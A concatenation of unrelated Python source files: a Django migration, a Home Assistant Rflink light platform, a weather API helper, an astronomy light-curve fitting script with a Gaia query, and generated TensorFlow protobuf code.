def backwards(self, orm):
# Deleting field 'DailyReport.test_group_size'
db.delete_column('experiments_dailyreport', 'test_group_size')
# Deleting field 'DailyReport.control_group_size'
db.delete_column('experiments_dailyreport', 'control_group_size')
# Changing field 'Participant.anonymous_visitor'
# (to signature: django.db.models.fields.related.ForeignKey(to=orm['experiments.AnonymousVisitor'], null=True))
db.alter_column('experiments_participant', 'anonymous_visitor_id', orm['experiments.participant:anonymous_visitor'])
models = {
'auth.group': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'unique': 'True'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)"},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '30', 'unique': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'experiments.anonymousvisitor': {
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'experiments.dailyreport': {
'control_group_size': ('django.db.models.fields.IntegerField', [], {}),
'control_score': ('django.db.models.fields.FloatField', [], {}),
'date': ('django.db.models.fields.DateField', [], {}),
'experiment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['experiments.Experiment']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'test_group_size': ('django.db.models.fields.IntegerField', [], {}),
'test_score': ('django.db.models.fields.FloatField', [], {})
},
'experiments.experiment': {
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'unique': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'experiments.goalrecord': {
'anonymous_visitor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['experiments.AnonymousVisitor']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'goal_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['experiments.GoalType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'experiments.goaltype': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'unique': 'True'})
},
'experiments.participant': {
'Meta': {'unique_together': "(('user', 'experiment'), ('anonymous_visitor', 'experiment'))"},
'anonymous_visitor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['experiments.AnonymousVisitor']", 'null': 'True', 'blank': 'True'}),
'enrollment_date': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'experiment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['experiments.Experiment']"}),
'group': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'})
}
}
complete_apps = ['experiments']
|
py | b410fdceff7bcd2d58648e4a7ae98037f53adbf0 | """
Support for Rflink lights.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/light.rflink/
"""
import asyncio
import logging
from homeassistant.components.light import (
ATTR_BRIGHTNESS, SUPPORT_BRIGHTNESS, Light)
from homeassistant.components.rflink import (
CONF_ALIASES, CONF_ALIASSES, CONF_AUTOMATIC_ADD, CONF_DEVICE_DEFAULTS,
CONF_DEVICES, CONF_FIRE_EVENT, CONF_GROUP, CONF_GROUP_ALIASES,
CONF_GROUP_ALIASSES, CONF_IGNORE_DEVICES, CONF_NOGROUP_ALIASES,
CONF_NOGROUP_ALIASSES, CONF_SIGNAL_REPETITIONS, DATA_DEVICE_REGISTER,
DATA_ENTITY_GROUP_LOOKUP, DATA_ENTITY_LOOKUP, DEVICE_DEFAULTS_SCHEMA,
DOMAIN, EVENT_KEY_COMMAND, EVENT_KEY_ID, SwitchableRflinkDevice, cv,
remove_deprecated, vol)
from homeassistant.const import (
CONF_NAME, CONF_PLATFORM, CONF_TYPE, STATE_UNKNOWN)
from homeassistant.helpers.deprecation import get_deprecated
DEPENDENCIES = ['rflink']
_LOGGER = logging.getLogger(__name__)
TYPE_DIMMABLE = 'dimmable'
TYPE_SWITCHABLE = 'switchable'
TYPE_HYBRID = 'hybrid'
TYPE_TOGGLE = 'toggle'
PLATFORM_SCHEMA = vol.Schema({
vol.Required(CONF_PLATFORM): DOMAIN,
vol.Optional(CONF_IGNORE_DEVICES): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_DEVICE_DEFAULTS, default=DEVICE_DEFAULTS_SCHEMA({})):
DEVICE_DEFAULTS_SCHEMA,
vol.Optional(CONF_AUTOMATIC_ADD, default=True): cv.boolean,
vol.Optional(CONF_DEVICES, default={}): vol.Schema({
cv.string: {
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_TYPE):
vol.Any(TYPE_DIMMABLE, TYPE_SWITCHABLE,
TYPE_HYBRID, TYPE_TOGGLE),
vol.Optional(CONF_ALIASES, default=[]):
vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_GROUP_ALIASES, default=[]):
vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_NOGROUP_ALIASES, default=[]):
vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_FIRE_EVENT): cv.boolean,
vol.Optional(CONF_SIGNAL_REPETITIONS): vol.Coerce(int),
vol.Optional(CONF_GROUP, default=True): cv.boolean,
# deprecated config options
vol.Optional(CONF_ALIASSES):
vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_GROUP_ALIASSES):
vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_NOGROUP_ALIASSES):
vol.All(cv.ensure_list, [cv.string]),
},
}),
})
def entity_type_for_device_id(device_id):
"""Return entity class for protocol of a given device_id.
Async friendly.
"""
entity_type_mapping = {
# KlikAanKlikUit support both dimmers and on/off switches on the same
# protocol
'newkaku': TYPE_HYBRID,
}
protocol = device_id.split('_')[0]
return entity_type_mapping.get(protocol, None)
def entity_class_for_type(entity_type):
"""Translate entity type to entity class.
Async friendly.
"""
entity_device_mapping = {
# sends only 'dim' commands not compatible with on/off switches
TYPE_DIMMABLE: DimmableRflinkLight,
# sends only 'on/off' commands not advices with dimmers and signal
# repetition
TYPE_SWITCHABLE: RflinkLight,
# sends 'dim' and 'on' command to support both dimmers and on/off
# switches. Not compatible with signal repetition.
TYPE_HYBRID: HybridRflinkLight,
# sends only 'on' commands for switches which turn on and off
# using the same 'on' command for both.
TYPE_TOGGLE: ToggleRflinkLight,
}
return entity_device_mapping.get(entity_type, RflinkLight)
def devices_from_config(domain_config, hass=None):
"""Parse configuration and add Rflink light devices."""
devices = []
for device_id, config in domain_config[CONF_DEVICES].items():
# Determine which kind of entity to create
if CONF_TYPE in config:
# Remove type from config to not pass it as and argument to entity
# instantiation
entity_type = config.pop(CONF_TYPE)
else:
entity_type = entity_type_for_device_id(device_id)
entity_class = entity_class_for_type(entity_type)
device_config = dict(domain_config[CONF_DEVICE_DEFAULTS], **config)
remove_deprecated(device_config)
is_hybrid = entity_class is HybridRflinkLight
# Make user aware this can cause problems
repetitions_enabled = device_config[CONF_SIGNAL_REPETITIONS] != 1
if is_hybrid and repetitions_enabled:
_LOGGER.warning(
"Hybrid type for %s not compatible with signal "
"repetitions. Please set 'dimmable' or 'switchable' "
"type explicitly in configuration", device_id)
device = entity_class(device_id, hass, **device_config)
devices.append(device)
# Register entity (and aliases) to listen to incoming rflink events
# Device id and normal aliases respond to normal and group command
hass.data[DATA_ENTITY_LOOKUP][
EVENT_KEY_COMMAND][device_id].append(device)
if config[CONF_GROUP]:
hass.data[DATA_ENTITY_GROUP_LOOKUP][
EVENT_KEY_COMMAND][device_id].append(device)
for _id in get_deprecated(config, CONF_ALIASES, CONF_ALIASSES):
hass.data[DATA_ENTITY_LOOKUP][
EVENT_KEY_COMMAND][_id].append(device)
hass.data[DATA_ENTITY_GROUP_LOOKUP][
EVENT_KEY_COMMAND][_id].append(device)
# group_aliases only respond to group commands
for _id in get_deprecated(
config, CONF_GROUP_ALIASES, CONF_GROUP_ALIASSES):
hass.data[DATA_ENTITY_GROUP_LOOKUP][
EVENT_KEY_COMMAND][_id].append(device)
# nogroup_aliases only respond to normal commands
for _id in get_deprecated(
config, CONF_NOGROUP_ALIASES, CONF_NOGROUP_ALIASSES):
hass.data[DATA_ENTITY_LOOKUP][
EVENT_KEY_COMMAND][_id].append(device)
return devices
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Set up the Rflink light platform."""
async_add_entities(devices_from_config(config, hass))
@asyncio.coroutine
def add_new_device(event):
"""Check if device is known, otherwise add to list of known devices."""
device_id = event[EVENT_KEY_ID]
entity_type = entity_type_for_device_id(event[EVENT_KEY_ID])
entity_class = entity_class_for_type(entity_type)
device_config = config[CONF_DEVICE_DEFAULTS]
device = entity_class(device_id, hass, **device_config)
async_add_entities([device])
# Register entity to listen to incoming Rflink events
hass.data[DATA_ENTITY_LOOKUP][
EVENT_KEY_COMMAND][device_id].append(device)
# Schedule task to process event after entity is created
hass.async_add_job(device.handle_event, event)
if config[CONF_AUTOMATIC_ADD]:
hass.data[DATA_DEVICE_REGISTER][EVENT_KEY_COMMAND] = add_new_device
class RflinkLight(SwitchableRflinkDevice, Light):
"""Representation of a Rflink light."""
pass
class DimmableRflinkLight(SwitchableRflinkDevice, Light):
"""Rflink light device that support dimming."""
_brightness = 255
@asyncio.coroutine
def async_turn_on(self, **kwargs):
"""Turn the device on."""
if ATTR_BRIGHTNESS in kwargs:
# rflink only support 16 brightness levels
self._brightness = int(kwargs[ATTR_BRIGHTNESS] / 17) * 17
# Turn on light at the requested dim level
yield from self._async_handle_command('dim', self._brightness)
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
return self._brightness
@property
def supported_features(self):
"""Flag supported features."""
return SUPPORT_BRIGHTNESS
class HybridRflinkLight(SwitchableRflinkDevice, Light):
"""Rflink light device that sends out both dim and on/off commands.
Used for protocols which support lights that are not exclusively on/off
style. For example KlikAanKlikUit supports both on/off and dimmable light
switches using the same protocol. This type allows unconfigured
KlikAanKlikUit devices to support dimming without breaking support for
on/off switches.
This type is not compatible with signal repetitions as the 'dim' and 'on'
command are send sequential and multiple 'on' commands to a dimmable
device can cause the dimmer to switch into a pulsating brightness mode.
Which results in a nice house disco :)
"""
_brightness = 255
@asyncio.coroutine
def async_turn_on(self, **kwargs):
"""Turn the device on and set dim level."""
if ATTR_BRIGHTNESS in kwargs:
# rflink only support 16 brightness levels
self._brightness = int(kwargs[ATTR_BRIGHTNESS] / 17) * 17
# if receiver supports dimming this will turn on the light
# at the requested dim level
yield from self._async_handle_command('dim', self._brightness)
# if the receiving device does not support dimlevel this
# will ensure it is turned on when full brightness is set
if self._brightness == 255:
yield from self._async_handle_command('turn_on')
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
return self._brightness
@property
def supported_features(self):
"""Flag supported features."""
return SUPPORT_BRIGHTNESS
class ToggleRflinkLight(SwitchableRflinkDevice, Light):
"""Rflink light device which sends out only 'on' commands.
Some switches like for example Livolo light switches use the
same 'on' command to switch on and switch off the lights.
If the light is on and 'on' gets sent, the light will turn off
and if the light is off and 'on' gets sent, the light will turn on.
"""
@property
def entity_id(self):
"""Return entity id."""
return "light.{}".format(self.name)
def _handle_event(self, event):
"""Adjust state if Rflink picks up a remote command for this device."""
self.cancel_queued_send_commands()
command = event['command']
if command == 'on':
# if the state is unknown or false, it gets set as true
# if the state is true, it gets set as false
self._state = self._state in [STATE_UNKNOWN, False]
@asyncio.coroutine
def async_turn_on(self, **kwargs):
"""Turn the device on."""
yield from self._async_handle_command('toggle')
@asyncio.coroutine
def async_turn_off(self, **kwargs):
"""Turn the device off."""
yield from self._async_handle_command('toggle')
|
py | b410fec1b7dae7554b1fae456c24b309e607f02b | import requests
def get_weather_data(lat, lon, weather_api_key):
params = {"appid": weather_api_key, "lat": str(lat), "lon": str(lon)}
weatherRequest = requests.get(
"https://api.openweathermap.org/data/2.5/weather?", params=params)
weatherResponse = weatherRequest.json() # Converts into type 'dict'
wind_heading = weatherResponse['wind']['deg']
temperature = (weatherResponse.get('main')).get('temp')
humidity = (weatherResponse.get('main')).get('humidity')
visibility = weatherResponse.get('visibility')
wind_speed = (weatherResponse.get('wind')).get('speed')
weather_dict = {
"temperature": temperature,
"humidity": humidity,
"visibility": visibility,
"wind_speed": wind_speed,
"wind_heading": wind_heading
}
return weather_dict
|
py | b411017f68be4ebca613a297f9533048c62bb2cc | """
TODO:
- identify and rectify issues with Gauss Newton matrix dot and inverse issues
"""
#dependencies
import os
import csv
import math
import statistics
import numpy as np
import matplotlib.pyplot as plt
import astropy.units as u
from astropy import coordinates as coords
from astroquery.gaia import Gaia
from csv import writer
from numpy.linalg import inv
from numpy.linalg import det
#data locations; replace with coordinates of LC DAT directory and metadata txt file, respectively
LCdir = r"C:\Users\micha\Documents\BLG_data_processing\OGLE-ATLAS-RR-c\I"
outputdir = r"C:\Users\micha\Documents\BLG_data_processing\PROCESSED"
stardata = r"C:\Users\micha\Documents\BLG_data_processing\OGLE-ATLAS-RR-c\BLG_metadata.txt"
lastsortedloc = r"C:\Users\micha\Documents\BLG_data_processing\OGLE-ATLAS-RR-c\processed.txt"
colordeviationstats = r"C:\Users\micha\Documents\BLG_data_processing\OGLE-ATLAS-RR-c\stats.csv"
debugloc = r"C:\Users\micha\Documents\BLG_data_processing\OGLE-ATLAS-RR-c\debug.txt"
matrixbuglog = r"C:\Users\micha\Documents\BLG_data_processing\OGLE-ATLAS-RR-c\matrixbug.txt"
#get file directory
LCfilelist = os.listdir(LCdir)
LCfilelength = len(LCfilelist)
#reading all star data from DAT file (names and periods for wave fitting, RA and dec for Gaia query)
names = np.loadtxt(stardata, dtype=str, skiprows=7, usecols=0)
periods = np.loadtxt(stardata, skiprows=7, usecols=8)
fallbackRA = np.loadtxt(stardata, dtype = "str", skiprows = 7, usecols = 2)
allRA = np.loadtxt(stardata, dtype = "str", skiprows = 7, usecols = 3)
alldec = np.loadtxt(stardata, dtype = "str", skiprows = 7, usecols = 4)
#lastsaved
lastsorted = open(lastsortedloc, "r")
laststar = int(lastsorted.read())
lastsorted.close()
#implementing Gauss-Newton Algorithm for curve fitting non linear regression; in this case, of the form Asin(Bx+C)+D
def gaussnewton(name, phases, brightnesses, average, amplitude, mid_phase):
#in case of Gauss-Newton fitting error, we may fallback onto initial guess values for fit
fallback_sin = (amplitude * np.sin(((phases - mid_phase) * 2 * math.pi))) + average
fallback_rms = math.sqrt((1 / (fallback_sin.size)) * np.sum(abs(np.subtract(fallback_sin, brightnesses)) ** 2))
#in case of phase flipped midpoint mis-fit
phaseflip_fallback_sin = (-1 * fallback_sin) + (2 * average)
phaseflip_rms = math.sqrt((1 / (phaseflip_fallback_sin.size)) * np.sum(abs(np.subtract(phaseflip_fallback_sin, brightnesses)) ** 2))
if fallback_rms > phaseflip_rms:
fallback_sin = phaseflip_fallback_sin
fallback_rms = phaseflip_rms
#Gauss-Newton iterations and damping parameters
iter = 400
damping = 0.02
#PDEs in Gauss-Newton
def pdA(x, b, c):
return np.sin(b * x + c)
def pdB(x, a, b, c):
return a * x * np.cos(b * x + c)
def pdC(x, a, b, c):
return a * np.cos(b * x + c)
def pdD(x):
return 1
#least squares
def leastSquares(x, y, a, b, c, d):
return y - (a * np.sin(b * x + c) + d)
#standard method io
x = phases
y = brightnesses
#initial guesses for A, B, C, D in sine
B = np.matrix([[amplitude], [2 * math.pi], [(mid_phase) * 2 * math.pi], [average]])
#jacobian matrix for diff eq
J = np.zeros((x.size, 4))
#least square vector
r = np.zeros((x.size, 1))
for _ in range(0, iter):
for i in range(0, x.size):
#compute each value of r in this iteration
r[i, 0] = leastSquares(x[i], y[i], B[0], B[1], B[2], B[3])
#calculate the Values of Jacobian matrix on this iteration
J[i, 0] = pdA(x[i], B[1], B[2])
J[i, 1] = pdB(x[i], B[0], B[1], B[2])
J[i, 2] = pdC(x[i], B[0], B[1], B[2])
J[i, 3] = pdD(x[i])
Jt = J.T
if (det(np.dot(Jt, J)) == 0.0):
print("determinant is zero, inversion would kill the loop.")
matrixbugfile = open(matrixbuglog, "a")
matrixbugfile.write("\n")
matrixbugfile.write(name)
break
#print("transpose " + str(Jt))
#print("dot1 " + str(np.dot(Jt, J)))
#print("inv " + str(inv(np.dot(Jt, J))))
#print("dot2 " + str(np.dot(inv(np.dot(Jt, J)), Jt)))
#print("dot3 " + str((np.dot(np.dot(inv(np.dot(Jt, J)), Jt), r))))
B += damping * (np.dot(np.dot(inv(np.dot(Jt, J)), Jt), r))
#print("B " + str(B))
#generate Gauss-Newton fitted sine curve, and calculate RMS
gaussnewton_sin = np.array([B[0] * np.sin((B[1] * x) + B[2]) + B[3]])
rms = math.sqrt((1 / (gaussnewton_sin.size)) * np.sum(abs(np.subtract(gaussnewton_sin, brightnesses)) ** 2))
#fallback in case of fitting failure, use initial values
if rms > fallback_rms:
print("gaussnewton failed, fallback to standard")
gaussnewton_sin = fallback_sin
rms = fallback_rms
#read Gauss-Newton failrate
debugfiler = open(debugloc, "r")
GNfail = int(debugfiler.read())
debugfiler.close()
#write Gauss-Newton fail to debug
debugfilew = open(debugloc, "w")
debugfilew.write(str(GNfail + 1))
debugfilew.close()
#shorten RMS for better visibility
roundedrms = float(rms)
roundedrms = round(roundedrms, 4 - int(math.floor(math.log10(abs(roundedrms)))) - 1)
#return fitted curve and RMS
return (gaussnewton_sin, str(rms), str(roundedrms))
#implementing method of querying Gaia data for the bp-rp color of the star
def gaiaquery(starnumber, fallbackRA, allRA, alldec):
#reading coords of the star
RA = allRA[starnumber]
#formatting issue in metadata, where they lose a column and dec is read as RA
if (float(RA.split(":")[0]) < 0.0):
print("metadata formatting issue, using fallback RA")
dec = RA
RA = fallbackRA[starnumber]
else:
dec = alldec[starnumber]
#setting up coords query, height and width search precision
coord = coords.SkyCoord(ra = RA, dec = dec, unit = (u.hourangle, u.deg), frame = "icrs")
height = u.Quantity(1, u.arcsec)
width = u.Quantity(1, u.arcsec)
#query
star = Gaia.query_object(coordinate=coord, width=width, height=height, columns=["source_id, ra, dec, bp_rp"])
#star is a table
#print("star:")
#print(star)
if (star["bp_rp"].size == 0):
color = "No color photometric data"
roundedcolor = color
else:
color = str(star["bp_rp"][0])
if color == "--":
color = "No color photometric data"
roundedcolor = color
else:
#shorten color for better visibility
roundedcolor = float(color)
roundedcolor = round(roundedcolor, 5 - int(math.floor(math.log10(abs(roundedcolor))) - 1))
#return coordinates, color
return (RA, dec, color, roundedcolor)
def plot(phases, brightnesses, gaussnewton_sin, RA, dec, rms, color, name, outputdir):
fig = plt.figure(figsize = (10,5))
fig.suptitle(str(name), fontsize = 22, fontweight = 'bold')
ax = fig.add_subplot(111)
fig.subplots_adjust(left = 0.1, right = 0.98, top = 0.87, bottom = 0.1)
ax.set_xlabel("Phase")
ax.set_ylabel("Magnitude")
#plotting original LC, and fitted sine curve
ax.scatter(phases, brightnesses)
ax.scatter(phases, gaussnewton_sin)
#adding legend to graph for readability
ax.legend(["Original LC", "Fitted Sine Curve"])
#plotting the RMS deviation onto the graph
ax.text(0.94, 1.03, ("RMS = " + str(rms)), verticalalignment = 'bottom', horizontalalignment = 'center', transform = ax.transAxes, color = 'purple', fontsize = 10)
#plotting coords, color onto the graph
ax.text(0.01, 1.09, ("RA = " + str(RA)), verticalalignment = 'bottom', horizontalalignment = 'center', transform = ax.transAxes, color = 'green', fontsize = 8)
ax.text(0.01, 1.06, ("dec = " + str(dec)), verticalalignment = 'bottom', horizontalalignment = 'center', transform = ax.transAxes, color = 'green', fontsize = 8)
if color == "No color photometric data":
ax.text(0.01, 1.03, (str(color)), verticalalignment = 'bottom', horizontalalignment = 'center', transform = ax.transAxes, color = 'orange', fontsize = 7)
else:
ax.text(0.01, 1.03, ("Color = " + str(color)), verticalalignment = 'bottom', horizontalalignment = 'center', transform = ax.transAxes, color = 'orange', fontsize = 8)
#show plot if testing in IDE
#plt.show()
#save plot
plt.savefig((outputdir + "\\" + (name) + ".png"), format = "png")
plt.close("all")
#driver to iterate through all the stars, starting from where we last left off
for countLC in range(laststar, LCfilelength, 1):
#specifying the LC data file, without iterating through listdir in outer for loop
file = LCfilelist[countLC]
# reading LC data from LC files (dates and brightness)
#trim initial whitespaces in cases where time starts with 3 digit JD, so there is whitespace before time
dates = []
brightnesses = []
with open(LCdir + "\\" + file, "rt") as f:
read = csv.reader(f, skipinitialspace = True)
for row in read:
date = float(row[0].split()[0])
brightness = float(row[0].split()[1])
dates.append(date)
brightnesses.append(brightness)
dates = np.array(dates)
brightnesses = np.array(brightnesses)
#grabbing relevant star data for current star (name, starting time, period) from DAT file
name = names[countLC]
starting_date = dates[0]
period = periods[countLC]
#simple progress indicator, tells us which star program is up to
print("now processing " + name)
#simple phasing calculation to convert dates to 0 to 1 of a complete phase
phases = ((dates - starting_date) / period) % 1
#determining approximate values to fit the sine curve (Amplitude, Average Height Shift, Phase Shift), for initial guess values of Gauss-Newton algorithm.
#mean value taken as the arithmetic mean of all y-values
average = (max(brightnesses) + min(brightnesses)) / 2
#better amplitude is the mean of the differences between average and max/min
amplitude = statistics.mean([(max(brightnesses) - average), average - min(brightnesses)])
#check for the closest value to the mean value of brightness (mid_brightness), find its corresponding x value (mid_index, mid_phase)
brightness_diff = lambda checkbrightness: abs(checkbrightness - average)
mid_brightness = min(brightnesses, key=brightness_diff)
mid_index = np.where(brightnesses == mid_brightness)[0][0]
mid_phase = phases[mid_index]
#Gauss-Newton fit, return the y values of the fitted gauss-newton curve
gaussnewton_sin, rms, roundedrms = gaussnewton(name, phases, brightnesses, average, amplitude, mid_phase)
#query Gaia for color
RA, dec, color, roundedcolor = gaiaquery(countLC, fallbackRA, allRA, alldec)
#temp star stats data to write to CSV later
tempstatsarray = [rms, color]
#plotting
#basic setup
plot(phases, brightnesses, gaussnewton_sin, RA, dec, roundedrms, roundedcolor, name, outputdir)
#autosaver and resume
lastsorted = open(lastsortedloc, "w")
lastsorted.write(str(countLC + 1))
lastsorted.close()
#star stats for final processing
with open(colordeviationstats, "a+", newline = "") as statsfile:
csv_writer = writer(statsfile)
csv_writer.writerow(tempstatsarray)
|
py | b41104799a926fc13867e47b7cecb3117b6534de | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: stfsclient/tensorflow/debug.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='stfsclient/tensorflow/debug.proto',
package='tensorflow',
syntax='proto3',
serialized_options=_b('\n\030org.tensorflow.frameworkB\013DebugProtosP\001Z<github.com/tensorflow/tensorflow/tensorflow/go/core/protobuf\370\001\001'),
serialized_pb=_b('\n!stfsclient/tensorflow/debug.proto\x12\ntensorflow\"\x8e\x01\n\x10\x44\x65\x62ugTensorWatch\x12\x11\n\tnode_name\x18\x01 \x01(\t\x12\x13\n\x0boutput_slot\x18\x02 \x01(\x05\x12\x11\n\tdebug_ops\x18\x03 \x03(\t\x12\x12\n\ndebug_urls\x18\x04 \x03(\t\x12+\n#tolerate_debug_op_creation_failures\x18\x05 \x01(\x08\"\x81\x01\n\x0c\x44\x65\x62ugOptions\x12=\n\x17\x64\x65\x62ug_tensor_watch_opts\x18\x04 \x03(\x0b\x32\x1c.tensorflow.DebugTensorWatch\x12\x13\n\x0bglobal_step\x18\n \x01(\x03\x12\x1d\n\x15reset_disk_byte_usage\x18\x0b \x01(\x08\"j\n\x12\x44\x65\x62uggedSourceFile\x12\x0c\n\x04host\x18\x01 \x01(\t\x12\x11\n\tfile_path\x18\x02 \x01(\t\x12\x15\n\rlast_modified\x18\x03 \x01(\x03\x12\r\n\x05\x62ytes\x18\x04 \x01(\x03\x12\r\n\x05lines\x18\x05 \x03(\t\"K\n\x13\x44\x65\x62uggedSourceFiles\x12\x34\n\x0csource_files\x18\x01 \x03(\x0b\x32\x1e.tensorflow.DebuggedSourceFileBj\n\x18org.tensorflow.frameworkB\x0b\x44\x65\x62ugProtosP\x01Z<github.com/tensorflow/tensorflow/tensorflow/go/core/protobuf\xf8\x01\x01\x62\x06proto3')
)
_DEBUGTENSORWATCH = _descriptor.Descriptor(
name='DebugTensorWatch',
full_name='tensorflow.DebugTensorWatch',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='node_name', full_name='tensorflow.DebugTensorWatch.node_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='output_slot', full_name='tensorflow.DebugTensorWatch.output_slot', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='debug_ops', full_name='tensorflow.DebugTensorWatch.debug_ops', index=2,
number=3, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='debug_urls', full_name='tensorflow.DebugTensorWatch.debug_urls', index=3,
number=4, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tolerate_debug_op_creation_failures', full_name='tensorflow.DebugTensorWatch.tolerate_debug_op_creation_failures', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=50,
serialized_end=192,
)
_DEBUGOPTIONS = _descriptor.Descriptor(
name='DebugOptions',
full_name='tensorflow.DebugOptions',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='debug_tensor_watch_opts', full_name='tensorflow.DebugOptions.debug_tensor_watch_opts', index=0,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='global_step', full_name='tensorflow.DebugOptions.global_step', index=1,
number=10, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='reset_disk_byte_usage', full_name='tensorflow.DebugOptions.reset_disk_byte_usage', index=2,
number=11, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=195,
serialized_end=324,
)
